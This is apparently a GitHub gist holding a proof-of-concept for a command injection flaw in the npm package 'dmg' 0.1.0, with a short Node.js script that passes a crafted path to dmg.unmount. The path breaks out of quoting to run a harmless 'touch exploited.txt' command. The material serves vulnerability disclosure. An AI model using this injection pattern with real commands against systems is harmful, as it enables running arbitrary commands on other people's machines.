mcoimbra/dmg-0.1.0_poc.js

Created October 26, 2023 18:03

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Select an option

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/mcoimbra/3a6ea1ead7a5c99c986f6aa89bf7e1dd.js"></script>
Save mcoimbra/3a6ea1ead7a5c99c986f6aa89bf7e1dd to your computer and use it in GitHub Desktop.

Download ZIP

Package dmg: it is possible to perform command injection by manipulating the 'path' argument which supposedly would contain a valid path to a .dmg file.

Raw

dmg-0.1.0_poc.js

	'use strict'

	const dmg = require('dmg');

	const path = '" \| touch exploited.txt \| echo /Volumes/ "';
	const callback = function() {};

	dmg.unmount(path, callback);

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment